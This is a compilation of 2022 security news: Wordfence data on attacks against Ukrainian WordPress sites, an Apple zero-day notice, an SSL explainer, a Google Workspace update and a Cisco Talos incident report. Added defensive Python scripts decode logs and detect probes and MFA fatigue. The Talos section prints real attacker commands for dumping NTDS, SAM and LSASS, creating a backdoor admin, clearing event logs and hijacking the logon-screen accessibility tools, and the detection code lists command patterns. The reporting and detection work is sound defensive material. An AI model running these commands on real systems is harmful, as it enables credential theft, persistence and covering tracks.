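For log triage, the layering described above (URL encoding wrapped around base64) can be peeled mechanically. The decoder below is an added example and not Wordfence's rule logic: the request bodies, the parameter name `q` and the `COMMAND_TOKENS` list are constructed assumptions, with the encoded value chosen so that it decodes to a harmless marker command like the one the article describes.

```python
"""Peel URL-encoding and base64 layers from POST form values for log triage."""
import base64
import binascii
import re
from urllib.parse import unquote, unquote_plus

B64_RE = re.compile(r"^[A-Za-z0-9+/]{8,}={0,2}$")
PCT_RE = re.compile(r"%[0-9A-Fa-f]{2}")
MAX_LAYERS = 5   # stop on pathological nesting
# Assumption: generic shell/PHP tokens worth surfacing once a value is decoded.
COMMAND_TOKENS = ("echo", "eval", "system", "exec", "passthru",
                  "shell_exec", "wget", "curl")

# Constructed request bodies; the second one is URL-encoded twice.
SAMPLE_BODY = "action=upload&name=report.txt&q=ZWNobyBYT19TcDNjdHJhOw%3D%3D"
DOUBLE_ENCODED_BODY = "q=ZWNobyBYT19TcDNjdHJhOw%253D%253D"


def try_base64(value):
    """Return decoded text if value is strict base64 of printable UTF-8."""
    if len(value) % 4 or not B64_RE.match(value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None          # ordinary words rarely survive both checks
    if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return text
    return None


def peel(raw):
    """Return (decoded_value, layers) for one raw form value."""
    value, layers = unquote_plus(raw), []   # form layer: '+' means space
    if value != raw:
        layers.append("url")
    for _ in range(MAX_LAYERS):
        if PCT_RE.search(value):            # still percent-encoded underneath
            value = unquote(value)
            layers.append("url")
            continue
        decoded = try_base64(value.strip())
        if decoded is None:
            break
        value = decoded
        layers.append("base64")
    return value, layers


def analyze_body(body):
    """Report parameters that hid command-like text behind base64."""
    findings = []
    for pair in body.split("&"):
        name, _, raw = pair.partition("=")
        value, layers = peel(raw)
        indicators = [t for t in COMMAND_TOKENS
                      if re.search(r"\b" + re.escape(t) + r"\b", value, re.I)]
        if "base64" in layers and indicators:
            findings.append({"param": unquote_plus(name), "layers": layers,
                             "decoded": value, "indicators": indicators})
    return findings


if __name__ == "__main__":
    for body in (SAMPLE_BODY, DOUBLE_ENCODED_BODY):
        print(analyze_body(body))
```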

When we look at the top known malicious IP addresses blocked worldwide, the top 15 are IP addresses within Russia. This does not match what we are seeing in Ukraine, where the top attacking IP addresses vary in location across North America, Europe, and Asia, with only three in Russia. However, there is a similarity. The IP address in 15th position worldwide for most initiated exploit attempts is in 4th position for blocked attacks against .ua domains. The IP address, 152.89.196.102, is part of an ASN belonging to Chang Way Technologies Co. Limited. The IP itself is located in Russia, but assigned to a company named Starcrecium Limited, which is based in Cyprus and has been used to conduct attacks of this type in the past. This IP has been blocked 78,438 times on .ua websites, with a total of 3,803,734 blocked attack attempts worldwide.

When you consider the fact that we logged malicious activity from almost 2.1 million individual IP addresses in this time, and the 15th worldwide ranked IP was ranked 4th against an area as small as Ukraine, the number of blocked attacks becomes very significant. Additionally, there were three IP addresses that ranked higher in Ukraine, but did not even make the top 20 worldwide, showing that while there are threat actors who are not focusing heavily on Ukraine, others are very focused on Ukrainian websites. What we are seeing from the IP addresses targeting Ukrainian websites more heavily is similar to what we see here, with information gathering and uploading spam content being the two main goals of the attack attempts.

One thing to keep in mind here is the fact that all .ua sites get our real-time threat intelligence, which is typically reserved for Wordfence Premium, Care, and Response customers, so it is not possible to get a true comparison between the websites in Ukraine and the rest of the world. IP addresses are added to the blocklist for many reasons, including the attack types we outlined above. Often these addresses are blocked for simple malicious behavior, such as searching for the existence of specific files on a website. More complex behavior like searching for the ability to run commands on the server will also lead to an IP being added to the blocklist.

Known Malicious User-Agents

One way that we block attacks is by tracking known malicious user-agents. This was the second-largest category our firewall blocked on .ua domains. When we see a user-agent string that is consistently being used in malicious events, like the user-agent below, we add it to a firewall rule.

Known malicious user-agent string

User-agent strings can be set to an arbitrary value, so blocking user-agents is not sufficient to maintain security on its own. Nonetheless, tracking and blocking consistently malicious user-agents still allows us to block millions of additional attacks a day and provides us with a great degree of visibility into attacks that are less targeted at specific vulnerabilities. Many threat actors consistently use a given user-agent string, so this also allows us to block a large number of credential stuffing attacks on the first attempt, rather than after a certain threshold of failed logins.

There are many reasons a user-agent will be blocked by the Wordfence firewall, but always for consistent malicious activity. For instance, the user-agent here has been tracked in numerous types of attack attempts without consistent legitimate activity or false positives being detected. It is frequently found looking for configuration files, such as the aws.yml file in this example. Keep in mind that the fact that the actor is searching for this file does not automatically mean it exists on the server. However, if the file does exist and can be read by a would-be attacker, the data contained in the file would tell them a lot about the Amazon Web Services server configuration being used. This could lead to the discovery of vulnerabilities or other details that could help a malicious actor damage a website or server.

Malicious user-agent request example 1

Similarly, information about the server could be discovered no matter who the server provider is if a file that returns configuration information, such as an info.php or server_info.php file, can be discovered and accessed. Knowing the web server version, PHP version, and other critical details can add up to a vulnerability discovery that makes it easy for a malicious actor to access a website.

Malicious user-agent request example 2

In addition to searching for configuration files and other malicious activities, we also see an attacker using this specific user-agent attempting to upload malicious files to the servers they are trying to compromise. The following shows an attacker using the same known malicious user-agent attempting to upload a zip file, which, if successful, unzips to install a file named sp3ctra_XO.php on the server. When we said there were clues that these attack attempts were being perpetrated by the same threat actor, you can see here what one of those clues is: the sp3ctra_XO.php filename is a variation of the XO_Sp3ctra output seen earlier.

Malicious user-agent request example 3

Over the past 30 days, we have observed this user-agent string used in more than 1.3 million attack attempts against Ukrainian websites. This makes it the largest attacking user-agent that is not immediately recognizable as an unusual user-agent. The only user-agent string that had more tracked attack attempts is wp_is_mobile. These user-agent strings are among the dozens that have been observed over time to be consistently associated only with malicious activity.

The user-agent we are following here was logged in 1,115,824,706 attack attempts worldwide in the same time frame, making this a very common malicious user-agent string. With this being a prolific user-agent in attacks around the world, it is no surprise that it is being seen in regular attack attempts on Ukrainian websites. Whether specifically targeted, or just a victim of circumstance, Ukrainian websites are seeing an increase in attacks. This is likely due to heightened activity from threat actors globally.

Directory Traversal

The next largest category of attack attempts we have been blocking targeting .ua domains was directory traversal. This relies on a malicious actor getting into the site files wherever they can, often through a plugin or theme vulnerability, and trying to access files outside of the original file’s directory structure. We are primarily seeing this used in much the same way as the information disclosure attacks, as a way to access the wp-config.php file that potentially provides database credentials. Other uses for this type of attack can also include the ability to get a list of system users, or access other sensitive data stored on the server.

Directory traversal request example

In this example, the malicious actor attempted to download the site’s wp-config.php file by accessing the file structure through a download.php file in the twentyeleven theme folder, and moving up the directory structure to the WordPress root, where the wp-config.php file is located. This is seen in the request by adding ?file=..%2F..%2F..%2Fwp-config.php. This tells the server to look for a wp-config.php file that is three directories higher than the current directory.

This type of attack is often a guessing game for the malicious actor, as the path they are attempting to traverse may not even exist, but when it does, it can result in stolen data or damage to a website or system. The fact that the twentyeleven theme was used here does not necessarily indicate that the theme was vulnerable, or even installed on the site, only that the malicious actor was attempting to use it as a jumping off point while trying to find a vulnerable download.php file that could be used for directory traversal.

Information Disclosure

Information disclosure attacks are the fourth-largest attack type we blocked against .ua domains. The primary way we have observed threat actors attempting to exploit this type of vulnerability is through GET requests to a website, using common backup filenames, as seen in the example below. Unfortunately, due to the insecure practice of system administrators appending filenames with .bak as a method of making a backup of a file prior to modifying the contents, threat actors are likely to successfully access sensitive files by simply attempting to request critical files in known locations, with the .bak extension added. When successful, the contents of the file will be returned to the threat actor.

This is a fairly straightforward attack type, where the request simply returns the contents of the requested file. If a malicious actor can obtain the contents of a site’s wp-config.php file, even an outdated version of the file, they may be able to obtain the site’s database credentials. With a site’s database credentials, an attacker could gain full database access, provided they have access to the database to log in with the stolen credentials. This would then give the attacker the ability to add malicious users, change a site’s content, and even collect useful information to be used in future attacks against the site or its users.

Information disclosure request example
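The probe types described in the sections above (configuration-file discovery, directory traversal through a file parameter, and requests for backup copies of wp-config.php) can be flagged from a web server access log. The following is an added example, not Wordfence's firewall logic; the log lines, IP addresses and user-agent are constructed, and the backup suffixes other than .bak are assumptions.

```python
import posixpath
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Filenames named in the post as probe targets.
CONFIG_PROBES = {"aws.yml", "info.php", "server_info.php"}
SENSITIVE_FILES = {"wp-config.php"}
# ".bak" is from the post; the other suffixes are assumed common variants.
BACKUP_SUFFIXES = (".bak", ".old", ".orig", ".save", "~")

REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded '..%252F' is caught too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")


def escapes_base(value):
    """True if a relative path climbs above the directory it starts in."""
    normalized = posixpath.normpath(decode(value))
    return normalized == ".." or normalized.startswith("../")


def classify(target):
    """Return the set of probe labels that apply to one request target."""
    labels = set()
    parts = urlsplit(target)
    path = decode(parts.path)
    name = posixpath.basename(path).lower()

    if name in CONFIG_PROBES:
        labels.add("config-probe")
    for suffix in BACKUP_SUFFIXES:
        if name.endswith(suffix) and name[: -len(suffix)] in SENSITIVE_FILES:
            labels.add("backup-probe")
    # Traversal in the path itself or in any query parameter value.
    if ".." in path.split("/"):
        labels.add("traversal")
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if escapes_base(value):
            labels.add("traversal")
            if posixpath.basename(decode(value)).lower() in SENSITIVE_FILES:
                labels.add("sensitive-target")
    return labels


def scan_log(lines):
    """Return (client_ip, target, sorted labels) for every flagged request."""
    findings = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        labels = classify(match.group("target"))
        if labels:
            findings.append((match.group("ip"), match.group("target"), sorted(labels)))
    return findings


# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2000:10:00:01 +0000] "GET /wp-content/themes/twentyeleven/'
    'download.php?file=..%2F..%2F..%2Fwp-config.php HTTP/1.1" 403 199 "-" "ConstructedAgent/1.0"',
    '203.0.113.7 - - [01/Jan/2000:10:00:02 +0000] "GET /wp-config.php.bak HTTP/1.1" 404 0 "-" "ConstructedAgent/1.0"',
    '198.51.100.9 - - [01/Jan/2000:10:00:03 +0000] "GET /config/aws.yml HTTP/1.1" 404 0 "-" "ConstructedAgent/1.0"',
    '198.51.100.9 - - [01/Jan/2000:10:00:04 +0000] "GET /server_info.php HTTP/1.1" 404 0 "-" "ConstructedAgent/1.0"',
    '192.0.2.44 - - [01/Jan/2000:10:00:05 +0000] "GET /index.php?page=2&s=hello..world HTTP/1.1" 200 5120 "-" "ConstructedAgent/1.0"',
]

if __name__ == "__main__":
    for ip, target, labels in scan_log(SAMPLE_LOG):
        print(ip, labels, target)
```

A hit means the request was attempted, not that the file exists; pair the labels with the response status to separate blocked probes from successful reads.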

File Upload

File upload rounds out the top five categories of attack attempts we have been blocking targeting .ua domains. In these attempts, malicious actors try to get their own files uploaded to the server the website is hosted on. This serves a number of purposes, from defacing a website, to creating backdoors, and even distributing malware.

The example here is only one of the many types of upload attacks we have blocked. A malicious actor can use this POST request to upload a file to a vulnerable website that allows them to upload any file of their choosing. This can ultimately lead to remote code execution and full server compromise.

File upload request example with payload

The POST request in this case includes the contents of a common PHP file uploader named bala.php. This code provides a simple script to select and upload any file the malicious actor chooses. If the upload is successful they will see a message stating eXploiting Done, but if it fails the message will read Failed to Upload. The script also returns some general information about the system that is being accessed, including the name of the system and the operating system being used.

Another important thing to note about this request is that it attempts to utilize the Ioptimization plugin as an entry point. Ioptimization is a known malicious plugin that offers backdoor functionality, but was not actually installed in the site in question. This indicates that the threat actor was trying to find and take over sites that had been previously compromised by a different attacker.

BalaSniper upload example

The fact that file uploads are the most common blocked attack type is not at all surprising. File uploads can be used to distribute malware payloads, store spam content to be displayed in other locations, and install shells on the infected system, among a number of other malicious activities. If a malicious actor can upload an executable file to a site, it generally gives them full control of the infected site and a foothold to taking over the server hosting that site. It can also help them remain anonymous by allowing them to send out further attacks from the newly infected site.

Conclusion

In this post, we continued our analysis of the cyber attacks targeting Ukrainian websites. While there has been an increase in the number of attacks being blocked since the start of Russia’s invasion of Ukraine, the attacks do not appear to be focused. Known malicious IP addresses were the most common reason we blocked attacks in the last 30 days; however, information stealing and spam were the most common end goals for the observed attack attempts.

If you believe your site has been compromised as a result of a vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both of these products include hands-on support in case you need further assistance.

Source :
https://www.wordfence.com/blog/2022/08/analyzing-attack-data-and-trends-targeting-ukrainian-domains/

Apple Releases Security Updates to Patch Two New Zero-Day Vulnerabilities

Apple on Wednesday released security updates for iOS, iPadOS, and macOS platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.

The list of issues is below –

  • CVE-2022-32893 – An out-of-bounds issue in WebKit which could lead to the execution of arbitrary code by processing specially crafted web content
  • CVE-2022-32894 – An out-of-bounds issue in the operating system’s Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges

Apple said it addressed both the issues with improved bounds checking, adding it’s aware the vulnerabilities “may have been actively exploited.”

The company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it’s likely that they were abused as part of highly-targeted intrusions.

The latest update brings the total number of zero-days patched by Apple to six since the start of the year –

  • CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
  • CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
  • CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
  • CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges

Both the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).

Update: Apple on Thursday released a security update for Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.

Source :
https://thehackernews.com/2022/08/apple-releases-security-updates-to.html

What are the Benefits of Adding an SSL Certificate to Your No-IP Free, Enhanced or Plus Hostname?

SSL Certificates are a great way to increase the security of your hostname because they add an extra layer of security for you and anyone that visits your hostname. Learn the benefits of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname.

What is an SSL Certificate?

SSL stands for Secure Sockets Layer. This means that your hostname is given a secure connection between it, the Internet browser, and the webserver. This allows websites to transmit private data online, without the worry of it being stolen. You can tell that a website has an SSL certificate enabled when the HTTP in the URL ends with an S, making it HTTPS. Example: https://www.noip.com.

What are the advantages of adding an SSL Certificate to your Free, Enhanced Dynamic DNS or Plus Managed DNS hostname?

Encryption and Verification

This is the biggest benefit of adding an SSL certificate to your hostname. The extra layer of encryption shows that your hostname is safe for people to visit. All of your visitor’s data will now be transmitted over an encrypted connection to the hostname and others won’t be able to see what is being sent.

The SSL Certificate also checks that the information it receives is coming from the expected domain. So, if your customer sends personal or private information, the SSL Certificate guarantees it is being sent to the secure site, and not to a potentially malicious one.

Ensures Data Integrity

A website that doesn’t have an SSL Certificate enabled sends data in a plain text format. This means that all of the data that is being sent between the server and the browser can be easily read. If a hacker were to gain access to your domain and then change the information being presented on your hostname, this is an example of domain spoofing.

Domain spoofing happens when a hacker gains access to the information on a website and then changes it before it gets sent to the browser for the user. When this happens, the user is typically not even aware they are visiting a compromised website. When an SSL certificate is enabled on the hostname, this becomes much harder as the data is not sent in plain text, but is sent in an encrypted, unreadable format.

Gains Your Users’ Trust

When you use an SSL Certificate, your hostname shows up with an HTTPS and a lock icon, signifying the hostname is secure. This helps users feel safe when they are on your hostname and makes them feel comfortable if you are asking them to enter sensitive information, like credit cards, or Social Security numbers.

Our Free Dynamic DNS, Enhanced Dynamic DNS and Plus Managed DNS accounts all come with 1 Free TrustCor Standard DV SSL Certificate. Additional SSL Certificates can be purchased and start at just $19.99 per year. You can learn more about each SSL Certificate and how you can add one today here.

Source :
https://www.noip.com/blog/2022/02/22/benefits-adding-ssl-certificate-ip-free-enhanced-hostname/

Google now blocks Workspace account hijacking attempts automatically

Google Workspace (formerly G Suite) now has stronger protections for risky account actions, automatically blocking hijacking attempts with identity verification prompts and logging them for further investigation.

This added layer of security will block threat actors who gain access to a user’s account to protect personal data and sensitive information belonging to their organization.

The enhanced account protection capabilities are available to all Google Workspace customers, including legacy G Suite Basic and Business customers.

“Google will evaluate the session attempting the action, and if it’s deemed risky, it will be challenged with a ‘Verify it’s You’ prompt,” Google said.

“Through a second and trusted factor, such as a 2-step verification code, users can confirm the validity of the action.”

For instance, this new feature would block sensitive actions such as attempts to change the account’s name until “the true account owner can verify that this was intentional.”

Admins can disable it for users stuck behind login prompts

Google added that admins could also temporarily disable login challenges triggered on sensitive account actions for users who can’t get past the verification prompts.

“In the Admin console under Users > ‘UserName’ > Security, admins can toggle login challenges OFF for ten minutes if a user gets stuck behind a ‘verify it’s you prompt’,” the company explained.

“We strongly recommend only using this option if contact with the user is credibly established, such as via a video call.”

It’s also important to mention that this feature only supports users using Google as their identity provider, blocking actions taken within Google products, with SAML users not being supported now.

This update builds on a previous Google Workspace security improvement announced in June, with new alerts added to inform of critical and sensitive changes to admin accounts.

Google has further secured Workspace users from attacks by rolling out new Google Drive warning banners in January to warn them of potentially suspicious files used for malware delivery and phishing attacks.

One year ago, in June 2021, the company also added new Google Drive phishing and malware protections for enterprises that automatically mark all suspicious files, making them only visible to admins and owners.

Source :
https://www.bleepingcomputer.com/news/security/google-now-blocks-workspace-account-hijacking-attempts-automatically/

Cisco Talos shares insights related to recent cyber attack on Cisco

UPDATE HISTORY

DATE | DESCRIPTION OF UPDATES
Aug. 10th 2022 | Adding clarifying details on activity involving active directory.
Aug. 10th 2022 | Update made to the Cisco Response and Recommendations section related to MFA.

EXECUTIVE SUMMARY

  • On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate. 
  • During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized. 
  • The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user. 
  • CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc. 
  • After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment. 
  • The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful. 
  • We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators. 
  • For further information see the Cisco Response page here.

INITIAL VECTOR

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka “vishing”) and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.  

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms. 
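The pattern described above, a run of rejected or ignored MFA pushes that ends in an approval and is followed by enrollment of a new device, can be detected in authentication logs. The following is an added example, not Cisco or Duo code; the event names, field names, thresholds and sample events are all assumptions constructed for illustration and do not reflect any vendor's log schema.

```python
from collections import defaultdict, deque

WINDOW = 600          # seconds; assumed look-back window for rejected pushes
MIN_REJECTED = 5      # assumed count of denied/ignored pushes that makes an approval suspect
ENROLL_WINDOW = 3600  # assumed: enrollment within an hour of the suspect approval


def detect_push_fatigue(events):
    """Return alerts for approvals that follow a push flood, and for device
    enrollments that follow such an approval."""
    recent = defaultdict(deque)   # user -> timestamps of denied/timed-out pushes
    suspect_approval = {}         # user -> time of the suspect approval
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        user, t, kind = ev["user"], ev["time"], ev["event"]
        rejected = recent[user]
        # Drop rejected pushes that have aged out of the look-back window.
        while rejected and t - rejected[0] > WINDOW:
            rejected.popleft()
        if kind in ("push_denied", "push_timeout"):
            rejected.append(t)
        elif kind == "push_approved":
            if len(rejected) >= MIN_REJECTED:
                alerts.append({"user": user, "time": t,
                               "alert": "approval-after-push-flood",
                               "rejected": len(rejected)})
                suspect_approval[user] = t
            rejected.clear()
        elif kind == "device_enrolled":
            t0 = suspect_approval.get(user)
            if t0 is not None and t - t0 <= ENROLL_WINDOW:
                alerts.append({"user": user, "time": t,
                               "alert": "device-enrolled-after-suspect-approval",
                               "device": ev.get("device")})
    return alerts


# Constructed events: "alice" is flooded and eventually approves; "bob" retries once.
SAMPLE_EVENTS = [
    {"time": 0, "user": "alice", "event": "push_denied"},
    {"time": 30, "user": "alice", "event": "push_timeout"},
    {"time": 60, "user": "alice", "event": "push_denied"},
    {"time": 90, "user": "alice", "event": "push_timeout"},
    {"time": 100, "user": "bob", "event": "push_timeout"},
    {"time": 120, "user": "alice", "event": "push_denied"},
    {"time": 130, "user": "bob", "event": "push_approved"},
    {"time": 150, "user": "alice", "event": "push_denied"},
    {"time": 170, "user": "alice", "event": "push_approved"},
    {"time": 400, "user": "alice", "event": "device_enrolled", "device": "constructed-phone-2"},
    {"time": 5000, "user": "bob", "event": "device_enrolled", "device": "constructed-laptop"},
]

if __name__ == "__main__":
    for alert in detect_push_fatigue(SAMPLE_EVENTS):
        print(alert)
```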

POST-COMPROMISE TTPS

Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment. 

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment. 

After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.  

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:

powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q 

They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment. 

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine. 

C:\Windows\system32\net user z Lh199211* /add 
C:\Windows\system32\net localgroup administrators z /add

This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database on compromised windows hosts.  

reg save hklm\system system 
reg save hklm\sam sam 
reg save HKLM\security sec

On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS. 

tasklist | findstr lsass 
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full

The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system. 

wevtutil.exe el 
wevtutil.exe cl [LOGNAME]

In many cases, we observed the attacker removing the previously created local administrator account.  

net user z /delete

To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems. 

netsh advfirewall firewall set rule group=remote desktop new enable=Yes

We also observed the installation of additional remote access tools, such as TeamViewer and LogMeIn. 

C:\Windows\System32\msiexec.exe /i C:\Users\[USERNAME]\Pictures\LogMeIn.msi

The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:  

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f 
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f

This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.  
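The command lines quoted in this section can be matched against process-creation telemetry, and the create-then-delete handling of the local administrator account can be correlated per host. The following is an added example, not Cisco Talos detection content; the events, hostnames and timestamps are constructed, the password is replaced by a placeholder, and the "reg add" prefix on the Image File Execution Options entry is an assumption because the write-up lists only the key values.

```python
import re

# One rule per command family quoted in the write-up above.
RULES = {
    "ntds-ifm-dump": r"\bntdsutil(\.exe)?\b.*\bifm\b.*\bcreate\s+full\b",
    "local-user-create": r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b",
    "local-admin-add": r"\bnet1?(\.exe)?\s+localgroup\s+administrators\s+\S+\s+/add\b",
    "registry-hive-save": r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b",
    "lsass-minidump": r"\bcomsvcs\.dll\W+minidump\b",
    "eventlog-clear": r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b",
    "rdp-firewall-enable": r'\bnetsh(\.exe)?\s+advfirewall\s+firewall\s+set\s+rule\s+'
                           r'group="?remote desktop"?\s+new\s+enable=yes\b',
    "ifeo-logon-bypass": r"image file execution options\\(sethc|narrator)\.exe\b.*\s/v\s+debugger\b",
}
COMPILED = {name: re.compile(rx, re.IGNORECASE) for name, rx in RULES.items()}

ADMIN_ADD = re.compile(r"\bnet1?(?:\.exe)?\s+localgroup\s+administrators\s+(\S+)\s+/add\b", re.I)
USER_DEL = re.compile(r"\bnet1?(?:\.exe)?\s+user\s+(\S+)\s+/delete\b", re.I)


def match_rules(command_line):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in COMPILED.items() if rx.search(command_line))


def detect(events):
    """Return (time, host, rules) for each event that matches at least one rule."""
    hits = []
    for ev in events:
        rules = match_rules(ev["command_line"])
        if rules:
            hits.append((ev["time"], ev["host"], rules))
    return hits


def short_lived_admins(events):
    """Accounts added to Administrators and later deleted on the same host."""
    added, findings = {}, []
    for ev in sorted(events, key=lambda e: e["time"]):
        m = ADMIN_ADD.search(ev["command_line"])
        if m:
            added[(ev["host"], m.group(1).lower())] = ev["time"]
            continue
        m = USER_DEL.search(ev["command_line"])
        if m:
            key = (ev["host"], m.group(1).lower())
            if key in added:
                findings.append({"host": key[0], "account": key[1],
                                 "added": added.pop(key), "deleted": ev["time"]})
    return findings


def _ev(time, host, command_line):
    return {"time": "2000-01-01T" + time + "Z", "host": host, "command_line": command_line}


# Constructed process-creation events; only the command shapes come from the write-up.
SAMPLE_EVENTS = [
    _ev("10:01:00", "DC01", r"powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q"),
    _ev("10:05:00", "WS17", r"C:\Windows\system32\net user z [PASSWORD] /add"),
    _ev("10:05:10", "WS17", r"C:\Windows\system32\net localgroup administrators z /add"),
    _ev("10:07:00", "WS17", r"reg save hklm\sam sam"),
    _ev("10:08:00", "WS17", r"rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 612 C:\windows\temp\lsass.dmp full"),
    _ev("10:10:00", "WS17", r"wevtutil.exe el"),
    _ev("10:11:00", "WS17", r"wevtutil.exe cl Security"),
    _ev("10:12:00", "WS17", r"net user z /delete"),
    _ev("10:15:00", "WS17", r"netsh advfirewall firewall set rule group=remote desktop new enable=Yes"),
    _ev("10:16:00", "WS17", r'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f'),
    _ev("10:20:00", "WS17", r"net user"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
    print(short_lived_admins(SAMPLE_EVENTS))
```

Log enumeration with "wevtutil el" and a bare "net user" are deliberately left unflagged, since both are routine administrative commands on their own.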

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.  

